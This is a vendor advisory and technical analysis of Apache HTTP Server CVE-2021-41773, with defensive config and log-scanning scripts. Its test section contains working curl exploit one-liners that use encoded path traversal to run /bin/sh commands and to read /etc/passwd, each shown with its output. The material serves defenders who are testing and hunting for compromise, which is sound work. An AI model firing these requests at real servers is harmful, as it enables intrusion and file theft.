October 7, 2021

Technical Analysis: Apache HTTP Server CVE-2021-41773

By: Randori Attack Team

On October 5, 2021, the Apache Software Foundation provided an update that patched CVE-2021-41773. This vulnerability is a path normalization issue that can be leveraged to read arbitrary files and in some cases execute remote code in Apache’s widely adopted HTTP Server. It affects version 2.4.49 only but is actively being exploited in the wild and Randori has found numerous matching versions exposed on internet-facing assets.  

Randori Temptation Score for Apache 2.4.49

The Randori Attack Team has successfully developed a reliable working exploit, tested it in a lab environment and began leveraging the capability as part of Randori’s continuous and automated red team platform. Under the right configuration settings, this vulnerability is trivial to exploit and affected organizations should patch immediately. 

For defenders looking for a way to understand if they are impacted, the Randori Attack Team has provided details on the non-default configurations required for successful exploitation and steps organizations can take to test for the vulnerability.

Exploitable Configurations

To successfully exploit CVE-2021-41773, Apache 2.4.49 must be set up in a non-default configuration.

There are two configuration patterns that are susceptible to two different exploitation techniques:

  1. If mod_cgi is enabled and “require all granted” is applied to the default Directory block, then an attacker can execute remote code with permissions of the user running Apache.
  2. If mod_cgi is not enabled and “require all granted” is applied to the default Directory block, then an attacker can read arbitrary files with permissions of the user running Apache.

If a system has one of these configurations, exploitation of this vulnerability is trivial. If "require all granted" is present for any path, exploitation may be possible, and other cases may exist. Randori recommends upgrading to Apache 2.4.50.
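The two configuration patterns above can be checked directly in a server's httpd.conf. The following script is an added example, not Randori's tooling: it looks for an uncommented LoadModule line for mod_cgi (the cgid variant used with threaded MPMs is also accepted, an assumption beyond the post's wording) and for "Require all granted" inside the default <Directory /> block, and classifies the config into the two exposure patterns described above. It assumes the configuration is a single text blob (Include files are not followed) and does not check the Apache version, which must still be confirmed separately. The sample configs are constructed for the example.

```python
"""Added example (not from the Randori post): classify an Apache httpd.conf
against the two exploitable configuration patterns for CVE-2021-41773.
Assumptions: one text blob (Include directives are not followed); only the
default '<Directory />' block and the mod_cgi LoadModule line are inspected."""
import re

# Constructed sample configurations (not taken from the page).
VULN_RCE_CONF = """
LoadModule cgi_module modules/mod_cgi.so
<Directory />
    AllowOverride none
    Require all granted
</Directory>
"""

VULN_READ_CONF = """
#LoadModule cgi_module modules/mod_cgi.so
<Directory />
    Require all granted
</Directory>
"""

DEFAULT_CONF = """
LoadModule cgi_module modules/mod_cgi.so
<Directory />
    AllowOverride none
    Require all denied
</Directory>
<Directory "/var/www/html">
    Require all granted
</Directory>
"""

# Matches only the root block: <Directory /> or <Directory "/">, not subpaths.
DIR_BLOCK = re.compile(r'<Directory\s+"?/"?\s*>(.*?)</Directory>', re.S | re.I)
# cgi_module is what the post names; cgid_module (threaded MPM) is an assumption.
CGI_MODULE = re.compile(r'^\s*LoadModule\s+cgid?_module\b', re.M | re.I)


def strip_comments(conf):
    """Drop '#' comment lines so a commented-out LoadModule does not count."""
    return "\n".join(l for l in conf.splitlines() if not l.lstrip().startswith("#"))


def mod_cgi_enabled(conf):
    return bool(CGI_MODULE.search(strip_comments(conf)))


def default_dir_grants_all(conf):
    """True if the default Directory block contains 'Require all granted'."""
    m = DIR_BLOCK.search(strip_comments(conf))
    if not m:
        return False
    return re.search(r'^\s*Require\s+all\s+granted\s*$', m.group(1), re.M | re.I) is not None


def classify(conf):
    """Map a config to the post's two patterns, or report the default-deny case."""
    if not default_dir_grants_all(conf):
        return "default-directory-denied"
    return "rce-exposed" if mod_cgi_enabled(conf) else "file-read-exposed"


if __name__ == "__main__":
    for name, conf in (("rce", VULN_RCE_CONF), ("read", VULN_READ_CONF), ("default", DEFAULT_CONF)):
        print(name, "->", classify(conf))
```

Note that "default-directory-denied" only means the root block does not grant access; as the post says, "require all granted" on any other path may still allow exploitation, so treat this as a first triage step, not a clean bill of health.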

How To Test For Vulnerability

Scenario 1: Vulnerable to Remote Code Execution

Example of remote code execution on a system with mod_cgi enabled. 

curl "$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d 'echo;id'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Scenario 2: Vulnerable to File Inclusion

Example of reading a file on a vulnerable system without mod_cgi enabled.

curl "$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Scenario 3: Vulnerable to File Inclusion but not Remote Code Execution

Example of trying to run a command on a system that is vulnerable to file disclosure but does not have mod_cgi enabled.

$ curl "$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh" -d 'echo;id'
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.

Recommended Actions

Based on our research, we can confirm that for organizations running Apache 2.4.49 with a vulnerable configuration this issue is serious, and action should be taken to ensure the security of impacted devices.

The vulnerability was made public on October 5; therefore, organizations running instances of Apache 2.4.49 exposed to the Internet from that date forward should assume that an adversary may have gained access to their network. Randori recommends reviewing historical logs for anomalous behavior such as abnormal URL paths, unusual source IP connections, and other signs of compromise.
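The abnormal URL paths to look for are the encoded traversal requests shown in the test scenarios above. The script below is an added example for that log review, not part of the Randori post: it parses Apache combined-format access-log lines, URL-decodes each request path (repeatedly, so double-encoded variants such as %252e also collapse), and flags any request whose decoded path contains a ".." segment, recording whether the request targeted /cgi-bin/ and what status the server returned. The log lines are constructed for the example; the IP addresses are documentation ranges.

```python
"""Added example (not from the Randori post): flag encoded path-traversal
requests of the kind shown above in Apache access-log lines.
The log lines below are constructed for this example."""
import re
from urllib.parse import unquote

# Constructed sample log lines in Apache's combined/common format.
LOG_LINES = [
    '203.0.113.5 - - [06/Oct/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1234',
    '203.0.113.5 - - [06/Oct/2021:10:01:13 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1860',
    '198.51.100.9 - - [06/Oct/2021:10:02:40 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 52',
    '198.51.100.9 - - [06/Oct/2021:10:03:01 +0000] "GET /icons/..%2F..%2Fetc/passwd HTTP/1.1" 403 199',
    '192.0.2.7 - - [06/Oct/2021:10:04:00 +0000] "GET /docs/a..b/readme.txt HTTP/1.1" 200 77',
]

REQ = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_fully(path, rounds=3):
    """Percent-decode until stable (bounded) so %2e, %252e, %2F all resolve."""
    for _ in range(rounds):
        new = unquote(path)
        if new == path:
            break
        path = new
    return path


def has_traversal(path):
    """True if any path segment, after decoding, is exactly '..'.
    A literal 'a..b' segment is not traversal and is left alone."""
    decoded = decode_fully(path.split("?", 1)[0])
    segments = re.split(r"[/\\]+", decoded)
    return any(seg == ".." for seg in segments)


def flag_lines(lines):
    """Return one record per suspicious request, in log order."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        path = m.group("path")
        if not has_traversal(path):
            continue
        lower = path.lower()
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "path": path,
            "status": m.group("status"),
            "encoded": "%2e" in lower or "%2f" in lower,  # encoded dots/slashes
            "cgi": lower.startswith("/cgi-bin/"),          # RCE pattern from the post
        })
    return hits


if __name__ == "__main__":
    for hit in flag_lines(LOG_LINES):
        print(hit)
```

When triaging the output, a traversal request that the server answered with 200 is the signal that matters most: it means the path was served. A 403 or 404 on the same pattern shows an attempt that the configuration blocked, which is still worth correlating by source IP against the rest of the log.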

Organizations unsure of their exposure or looking to confirm their risk can request a free attack surface audit from Randori. This personalized assessment will analyze your organization's exposed internet-facing assets and provide a custom assessment of your most tempting access points and recommendations on how to reduce your risk.
